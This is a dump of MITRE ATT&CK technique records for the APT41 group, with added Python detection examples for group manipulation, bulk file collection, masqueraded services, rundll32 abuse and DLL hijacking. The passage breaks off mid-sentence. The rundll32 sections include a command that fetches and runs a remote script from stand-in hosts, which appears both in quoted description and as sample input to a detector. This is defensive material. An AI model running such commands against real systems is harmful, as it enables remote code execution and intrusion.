4155 lines
575 KiB
Plaintext
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist: APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has added user accounts to the User and Admin groups.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--373f6762-cda6-4ce7-894f-cac31a09a98b
revoked : False
technique : Account Manipulation
technique_description : Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials.

In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1098
matrix : mitre-attack
platform : ['Windows', 'Azure AD', 'Office 365', 'IaaS', 'Linux', 'macOS', 'Google Workspace', 'SaaS', 'Network', 'Containers']
data_sources : ['Command: Command Execution', 'Process: Process Creation', 'Active Directory: Active Directory Object Modification', 'File: File Modification', 'Group: Group Modification', 'User Account: User Account Modification']
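The group-membership change above is the kind of event the 'Group: Group Modification' and 'Command: Command Execution' data sources exist to catch. The following detection logic is an added example, not MITRE or APT41 code: it runs over a constructed list of Windows Security event records (the field names event_id, host, subject_user, member and target_group are a simplified stand-in for the real event XML) and over raw `net`/`net1` command lines, and flags additions to privileged groups plus any one account making such changes on more than one host.

```python
"""Flag account additions to privileged groups (the T1098 behaviour
described above). Added example, not MITRE or APT41 code: the event field
names are a simplified stand-in for the Windows Security event XML, and
the sample events are constructed."""
import re

# Windows Security event IDs for "member added to group":
# 4728 global security group, 4732 local security group, 4756 universal group.
GROUP_ADD_EVENTS = {4728, 4732, 4756}

# Groups whose membership changes warrant review (English names; matching on
# well-known SIDs such as S-1-5-32-544 would survive localisation).
PRIVILEGED_GROUPS = {
    "administrators", "domain admins", "enterprise admins", "schema admins",
    "backup operators", "remote desktop users", "account operators",
}

# Matches `net localgroup administrators bob /add` and
# `net1 group "Domain Admins" bob /add /domain`, with or without a path.
NET_GROUP_ADD = re.compile(
    r'^\s*(?:"?[^"\s]*\\)?net1?(?:\.exe)?"?\s+(?:localgroup|group)\s+.+\s/add\b', re.I)

# Constructed sample events (not real log data).
SAMPLE_EVENTS = [
    {"event_id": 4732, "host": "WS01", "subject_user": "CORP\\jdoe",
     "member": "CORP\\svc_backup", "target_group": "Administrators"},
    {"event_id": 4732, "host": "WS01", "subject_user": "CORP\\jdoe",
     "member": "CORP\\svc_backup", "target_group": "Users"},
    {"event_id": 4732, "host": "WS02", "subject_user": "CORP\\jdoe",
     "member": "CORP\\svc_backup", "target_group": "Administrators"},
    {"event_id": 4728, "host": "DC01", "subject_user": "CORP\\helpdesk1",
     "member": "CORP\\tmp_admin", "target_group": "Domain Admins"},
    {"event_id": 4733, "host": "WS01", "subject_user": "CORP\\jdoe",
     "member": "CORP\\old_user", "target_group": "Administrators"},  # 4733 is a removal
    {"event_id": 4728, "host": "DC01", "subject_user": "CORP\\helpdesk1",
     "member": "CORP\\analyst", "target_group": "Finance"},
]


def privileged_group_additions(events):
    """Events that add a member to one of PRIVILEGED_GROUPS."""
    return [ev for ev in events
            if ev["event_id"] in GROUP_ADD_EVENTS
            and ev["target_group"].lower() in PRIVILEGED_GROUPS]


def actors_spanning_hosts(events):
    """Subjects that added members to privileged groups on more than one host.
    A single change is routine admin work; the same account doing it across
    hosts looks like persistence being laid down."""
    hosts = {}
    for ev in privileged_group_additions(events):
        hosts.setdefault(ev["subject_user"], set()).add(ev["host"])
    return {actor: sorted(h) for actor, h in hosts.items() if len(h) > 1}


def is_group_add_command(cmdline):
    """True for net/net1 command lines that add a member to a group
    (account creation via `net user ... /add` is a different technique)."""
    return NET_GROUP_ADD.search(cmdline) is not None


if __name__ == "__main__":
    for ev in privileged_group_additions(SAMPLE_EVENTS):
        print(f"{ev['host']}: {ev['subject_user']} added {ev['member']} to {ev['target_group']}")
    print(actors_spanning_hosts(SAMPLE_EVENTS))
```

Matching on group name is the weak point of this rule; production detections key on the group SID carried in the event so that localised or renamed groups do not slip through.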
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002), [pwdump](https://attack.mitre.org/software/S0006), [PowerSploit](https://attack.mitre.org/software/S0194), and [Windows Credential Editor](https://attack.mitre.org/software/S0005).(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--35f5f7b9-8b86-4390-9f99-1d56aa1ae32a
revoked : False
technique : Tool
technique_description : Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) was not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)

Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')]
technique_id : T1588.002
matrix : mitre-attack
platform : ['PRE']
data_sources : ['Malware Repository: Malware Metadata']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has uploaded files and data from a compromised host.(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--54f6c1c8-f3c7-44a6-9a00-2195e03cf0ae
revoked : False
technique : Data from Local System
technique_description : Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.

Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='collection')]
technique_id : T1005
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Process: OS API Execution', 'Script: Script Execution', 'Command: Command Execution', 'Process: Process Creation', 'File: File Access']
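Collection from the local file system is hard to distinguish from normal work on a single event; what stands out is one process opening many distinct documents in a short span, which is what the 'File: File Access' data source above is for. The following is an added example, not MITRE or APT41 code: a sliding-window count of distinct document paths per (host, process) over a constructed list of file-read events (timestamp in seconds, host, process image, path), of the kind Sysmon/EDR file telemetry or Linux auditd open() records would supply.

```python
"""Detect a single process reading many distinct documents in a short
window, the bulk-collection pattern behind T1005. Added example, not
MITRE or APT41 code. Events are constructed (timestamp in seconds, host,
process image, path)."""
from collections import Counter, defaultdict

DOC_SUFFIXES = (".docx", ".doc", ".xlsx", ".pptx", ".pdf", ".txt", ".csv", ".pst", ".kdbx")


def is_document(path):
    return path.lower().endswith(DOC_SUFFIXES)


def bulk_readers(events, window=60, threshold=10):
    """Return (host, process, distinct_docs, first_ts, last_ts) for every
    (host, process) that read >= threshold distinct documents within any
    `window`-second span. Counting distinct paths, not reads, keeps a user
    autosaving one file from tripping the rule."""
    by_proc = defaultdict(list)
    for ts, host, proc, path in events:
        if is_document(path):
            by_proc[(host, proc)].append((ts, path.lower()))

    alerts = []
    for (host, proc), reads in by_proc.items():
        reads.sort()
        in_window = Counter()   # distinct paths currently inside the window
        left = 0
        for ts, path in reads:
            in_window[path] += 1
            # Slide the left edge until the window is at most `window` seconds wide.
            while ts - reads[left][0] > window:
                old = reads[left][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            if len(in_window) >= threshold:
                alerts.append((host, proc, len(in_window), reads[left][0], ts))
                break  # one alert per process is enough
    return alerts


# Constructed sample: ordinary editing by winword.exe and explorer.exe, plus a
# collector running under rundll32.exe that sweeps a Documents folder.
SAMPLE_EVENTS = [
    (0, "WS01", "winword.exe", r"C:\Users\alice\Documents\budget.docx"),
    (30, "WS01", "winword.exe", r"C:\Users\alice\Documents\budget.docx"),
    (45, "WS01", "winword.exe", r"C:\Users\alice\AppData\Local\Temp\~WRD0001.tmp"),
    (120, "WS01", "explorer.exe", r"C:\Users\alice\Documents\q1.xlsx"),
    (700, "WS01", "explorer.exe", r"C:\Users\alice\Documents\q2.xlsx"),
    (1300, "WS01", "explorer.exe", r"C:\Users\alice\Documents\q3.xlsx"),
] + [
    (2000 + i, "WS01", "rundll32.exe", rf"C:\Users\alice\Documents\report_{i}.docx")
    for i in range(12)
]

if __name__ == "__main__":
    for host, proc, n, first, last in bulk_readers(SAMPLE_EVENTS):
        print(f"{host}: {proc} read {n} distinct documents between t={first}s and t={last}s")
```

The window and threshold are the tuning knobs: backup agents and indexers legitimately read thousands of files, so in practice they are allowlisted by signed image path rather than by raising the threshold for everyone.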
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has created services to appear as benign system tools.(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--fce88056-31db-43be-be76-fb1aaf076ed1
revoked : False
technique : Masquerade Task or Service
technique_description : Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.

Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1036.004
matrix : mitre-attack
platform : ['Windows', 'Linux', 'macOS']
data_sources : ['Scheduled Job: Scheduled Job Modification', 'Service: Service Creation', 'Command: Command Execution', 'Service: Service Metadata', 'Scheduled Job: Scheduled Job Metadata']
```
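A service that borrows a legitimate name still has to point its ImagePath somewhere, and that is where the masquerade usually fails: the name says "Print Spooler" while the binary sits under ProgramData. The scoring below is an added example, not MITRE or APT41 code. It walks a constructed list of (service name, display name, ImagePath) records of the shape one exports from the Services registry key or `sc query`, compares names against a small constructed allowlist (a real baseline would come from a golden image), and flags exact-name collisions with the wrong binary, near-miss names, and binaries in user-writable directories.

```python
"""Score installed services whose names mimic legitimate ones but whose
binary lives where no real system service does (T1036.004). Added example,
not MITRE or APT41 code. KNOWN_SERVICES is a constructed subset and the
sample service records are constructed."""
import difflib
import re

# Known service name -> expected executable (constructed baseline).
KNOWN_SERVICES = {
    "wuauserv": "c:\\windows\\system32\\svchost.exe",
    "winmgmt": "c:\\windows\\system32\\svchost.exe",
    "wscsvc": "c:\\windows\\system32\\svchost.exe",
    "lanmanserver": "c:\\windows\\system32\\svchost.exe",
    "spooler": "c:\\windows\\system32\\spoolsv.exe",
}

USER_WRITABLE = re.compile(r"^[a-z]:\\(users|programdata|windows\\temp|temp)\\", re.I)


def image_exe(image_path):
    """Executable portion of an ImagePath value, lower-cased, without
    quotes or arguments (svchost entries carry `-k <group>`)."""
    s = image_path.strip()
    if s.startswith('"'):
        return s[1:s.index('"', 1)].lower()
    return s.split(" ", 1)[0].lower()


def assess_service(name, display_name, image_path):
    """Return (score, reasons). Higher means more likely a masquerade."""
    exe = image_exe(image_path)
    lname = name.lower()
    score, reasons = 0, []

    if lname in KNOWN_SERVICES:
        if exe != KNOWN_SERVICES[lname]:
            score += 3
            reasons.append(f"known service name but image is {exe}")
    else:
        # Near-miss of a known name: one dropped or swapped character.
        close = difflib.get_close_matches(lname, list(KNOWN_SERVICES), n=1, cutoff=0.8)
        if close:
            score += 2
            reasons.append(f"name resembles {close[0]}")

    if USER_WRITABLE.match(exe):
        score += 2
        reasons.append("image in a user-writable directory")

    if "windows" in display_name.lower() and not exe.startswith("c:\\windows\\"):
        score += 1
        reasons.append("Microsoft-style display name outside the Windows directory")

    return score, reasons


def suspicious_services(services, min_score=2):
    """Services scoring >= min_score, highest first."""
    out = []
    for name, display_name, image_path in services:
        score, reasons = assess_service(name, display_name, image_path)
        if score >= min_score:
            out.append((name, score, reasons))
    return sorted(out, key=lambda t: -t[1])


# Constructed sample (not from a real host).
SAMPLE_SERVICES = [
    ("wuauserv", "Windows Update", r"C:\Windows\system32\svchost.exe -k netsvcs"),
    ("Winmgmt", "Windows Management Instrumentation", r"C:\Windows\system32\svchost.exe -k netsvcs"),
    ("wuaserv", "Windows Update Service", r"C:\ProgramData\wuaserv.exe"),
    ("Spooler", "Print Spooler", r'"C:\Users\Public\spoolsv.exe" -service'),
    ("VendorAgent", "Vendor Backup Agent", r'"C:\Program Files\Vendor\agent.exe"'),
]

if __name__ == "__main__":
    for name, score, reasons in suspicious_services(SAMPLE_SERVICES):
        print(f"{name}: score {score}: " + "; ".join(reasons))
```

The same approach carries over to systemd: compare unit names under /etc/systemd/system against the distribution's own units and check that ExecStart points into /usr/bin or /usr/sbin rather than /tmp or a home directory.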
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has used rundll32.exe to execute a loader.(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--898211c4-915c-469f-be47-321d2d44af90
revoked : False
technique : Rundll32
technique_description : Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, rather than executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).

Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute.(Citation: Trend Micro CPL)

Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks.(Citation: This is Security Command Line Confusion)

Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe would first attempt to execute <code>ExampleFunctionW</code>, or failing that <code>ExampleFunctionA</code>, before loading <code>ExampleFunction</code>). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending <code>W</code> and/or <code>A</code> to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: <code>rundll32.exe file.dll,#1</code>).

Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1218.011
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Process: Process Creation', 'Command: Command Execution', 'File: File Metadata', 'Module: Module Load']
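The description above lists several distinct rundll32 abuses (script execution through mshtml, Control_RunDLL, ordinal exports, the W/A export-name lookup, renamed payload files). The following is an added example, not MITRE or APT41 code, that turns those into two checks: `resolve_export` reproduces the W, then A, then bare-name lookup order as the text describes it, so an analyst can see which export actually runs for a given command line, and `rundll32_indicators` scores a raw command line from 'Process: Process Creation' telemetry. The sample command lines are constructed, and the script: URL uses a reserved .invalid domain.

```python
"""Two checks for the rundll32 abuses described above (T1218.011). Added
example, not MITRE or APT41 code. Sample command lines are constructed."""
import re

RUNDLL32 = re.compile(r'^\s*"?(?:[^"\s]*\\)?rundll32(?:\.exe)?"?\s*(.*)$', re.I)
USER_WRITABLE = re.compile(r"(?:\\users\\|\\programdata\\|\\windows\\temp\\|\\appdata\\)", re.I)
SCRIPT_PREFIXES = ("javascript:", "vbscript:")


def resolve_export(exports, requested):
    """Name rundll32 would call for `requested`, given the DLL's export
    names: the W variant first, then the A variant, then the bare name."""
    for candidate in (requested + "W", requested + "A", requested):
        if candidate in exports:
            return candidate
    return None


def parse_rundll32(cmdline):
    """Split a rundll32 command line into (dll, entry, args); None if it is not rundll32."""
    m = RUNDLL32.match(cmdline)
    if not m:
        return None
    rest = m.group(1).strip()
    if "," not in rest:
        return rest.strip('"'), "", ""
    dll, after = rest.split(",", 1)          # entry point follows the first comma
    parts = after.strip().split(None, 1)
    entry = parts[0] if parts else ""
    args = parts[1] if len(parts) > 1 else ""
    return dll.strip().strip('"'), entry, args


def rundll32_indicators(cmdline):
    """Reasons this rundll32 invocation deserves a look; empty if none."""
    parsed = parse_rundll32(cmdline)
    if parsed is None:
        return []
    dll, entry, args = parsed
    ldll, lentry = dll.lower(), entry.lower()
    reasons = []
    if not dll:
        reasons.append("no DLL argument (bare rundll32 is a common injection host)")
    if ldll.startswith(SCRIPT_PREFIXES) or lentry == "runhtmlapplication":
        reasons.append("script execution through mshtml RunHTMLApplication")
    if lentry.startswith("#"):
        reasons.append("export called by ordinal")
    if lentry in ("control_rundll", "control_rundllasuser"):
        if ".cpl" not in args.lower() or USER_WRITABLE.search(args):
            reasons.append(f"Control_RunDLL with unexpected argument {args!r}")
    if ldll and not ldll.startswith(SCRIPT_PREFIXES) and not ldll.endswith(".dll"):
        reasons.append("DLL argument without a .dll extension")
    if USER_WRITABLE.search(ldll):
        reasons.append("DLL loaded from a user-writable path")
    return reasons


# Constructed sample command lines.
SAMPLE_CMDLINES = [
    r'rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL desk.cpl',
    r'rundll32.exe C:\Users\alice\AppData\Local\Temp\update.dat,#1',
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://c2.example.invalid/a.sct")',
    r'C:\Windows\System32\rundll32.exe',
    r'rundll32.exe "C:\Program Files\Vendor\lib.dll",Init --quiet',
]

if __name__ == "__main__":
    # The export named on the command line is not necessarily the one that runs.
    print(resolve_export({"Run", "RunW", "RunA"}, "Run"))
    for cmd in SAMPLE_CMDLINES:
        print(cmd, "->", rundll32_indicators(cmd))
```

The practical consequence of `resolve_export` is that a reverse engineer handed `rundll32.exe x.dll,Run` should open `RunW` and `RunA` before `Run`; the command-line checks are cheap enough to run on every process-creation event, with the first sample showing a benign Control Panel launch scoring zero.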
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has used search order hijacking to execute malicious payloads, such as Winnti RAT.(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--ffacfdd1-702e-4bb9-b60c-8e5c4cdf2a06
revoked : False
technique : DLL Search Order Hijacking
technique_description : Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program.(Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.

There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks,(Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL.(Citation: Microsoft Security Advisory 2269637)

Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)

If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1574.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['File: File Modification', 'Module: Module Load', 'File: File Creation']
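The description above says where a planted DLL has to sit to win, but not in what order the loader probes. The following is an added example, not MITRE or APT41 code, that encodes the documented default desktop-application search order (application directory, System32, the 16-bit system directory, the Windows directory, the current directory, then PATH; with SafeDllSearchMode disabled the current directory moves up to second) and the KnownDLLs short-circuit, then resolves names against a constructed file system to show which of three planted copies actually loads. The KnownDLLs set is a small constructed subset of the real registry value, and the model deliberately leaves out the manifest/redirection mechanisms the text covers separately.

```python
"""Model the DLL search order and show where a planted DLL wins
(T1574.001). Added example, not MITRE or APT41 code: the file system is a
constructed set of paths and KNOWN_DLLS is a constructed subset of the
real HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs value."""

SYSTEM32 = "c:\\windows\\system32"
SYSTEM16 = "c:\\windows\\system"      # 16-bit system directory
WINDIR = "c:\\windows"
# KnownDLLs are always mapped from System32; the loader never searches for them.
KNOWN_DLLS = {"kernel32.dll", "ntdll.dll", "user32.dll", "advapi32.dll"}


def search_order(app_dir, cwd, path_dirs, safe_search=True):
    """Directories probed, in order. SafeDllSearchMode (default on) pushes
    the current directory behind the system directories."""
    if safe_search:
        return [app_dir, SYSTEM32, SYSTEM16, WINDIR, cwd] + list(path_dirs)
    return [app_dir, cwd, SYSTEM32, SYSTEM16, WINDIR] + list(path_dirs)


def resolve_dll(dll, app_dir, cwd, path_dirs, fs, safe_search=True):
    """Full path the loader would pick for `dll`, or None if not found.
    `fs` is the set of lower-case paths that exist."""
    name = dll.lower()
    if "\\" in name:                     # fully qualified: no search at all
        return name if name in fs else None
    if name in KNOWN_DLLS:               # KnownDLLs short-circuit the search
        p = SYSTEM32 + "\\" + name
        return p if p in fs else None
    for d in search_order(app_dir, cwd, path_dirs, safe_search):
        candidate = d.lower().rstrip("\\") + "\\" + name
        if candidate in fs:
            return candidate
    return None


def hijacked(dll, app_dir, cwd, path_dirs, fs, safe_search=True):
    """True when a copy outside System32 shadows a DLL that also ships in System32."""
    chosen = resolve_dll(dll, app_dir, cwd, path_dirs, fs, safe_search)
    legit = SYSTEM32 + "\\" + dll.lower()
    return chosen is not None and legit in fs and chosen != legit


# Constructed file system: legitimate copies in System32, plus three planted
# copies: version.dll beside the application, dwmapi.dll in the user's
# Downloads folder (the application's CWD), and kernel32.dll beside the application.
FS = {
    SYSTEM32 + "\\version.dll",
    SYSTEM32 + "\\dwmapi.dll",
    SYSTEM32 + "\\kernel32.dll",
    "c:\\program files\\app\\app.exe",
    "c:\\program files\\app\\version.dll",
    "c:\\program files\\app\\kernel32.dll",
    "c:\\users\\alice\\downloads\\dwmapi.dll",
}
APP_DIR = "c:\\program files\\app"
CWD = "c:\\users\\alice\\downloads"
PATH_DIRS = ["c:\\windows\\system32", "c:\\tools"]

if __name__ == "__main__":
    for dll in ("version.dll", "dwmapi.dll", "kernel32.dll"):
        for safe in (True, False):
            chosen = resolve_dll(dll, APP_DIR, CWD, PATH_DIRS, FS, safe)
            print(f"{dll:13} safe={safe!s:5} -> {chosen}"
                  f"  hijacked={hijacked(dll, APP_DIR, CWD, PATH_DIRS, FS, safe)}")
```

Three outcomes fall out of the model: the copy beside the application always wins (the classic sideload), the copy in the current directory wins only when SafeDllSearchMode is off, and a planted kernel32.dll never loads because KnownDLLs bypass the search entirely. Hunting for this on a real host means diffing 'Module: Module Load' events against the expected System32 path for each loaded name, which is exactly what `hijacked` does for the constructed set.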
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has transferred implant files using Windows Admin Shares.(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--39808511-28ac-4cff-b6b4-49d996855e8a
revoked : False
technique : SMB/Windows Admin Shares
technique_description : Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.

SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.

Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='lateral-movement')]
technique_id : T1021.002
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Network Share: Network Share Access', 'Network Traffic: Network Traffic Flow', 'Logon Session: Logon Session Creation', 'Network Traffic: Network Connection Creation', 'Process: Process Creation', 'Command: Command Execution']
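The "Network Share: Network Share Access" data source above maps, on Windows, to Security event 5145, which is logged on the target host when a client is checked for access to a share. The following is an added detection example (not ATT&CK's own content and not taken from any APT41 report) that runs over constructed 5145-style records and flags writes of executable files into `ADMIN$` or `<drive>$` shares, then shows how many hosts each source touched, which is the lateral-movement pattern described above. The field names, the `allowed_sources` allow-list and the sample records are assumptions.

```python
"""Flag writes to Windows administrative shares in Security event 5145 records.

Added example; not part of ATT&CK or of any APT41 report. Event 5145 ("A network
share object was checked to see whether client can be granted desired access") is
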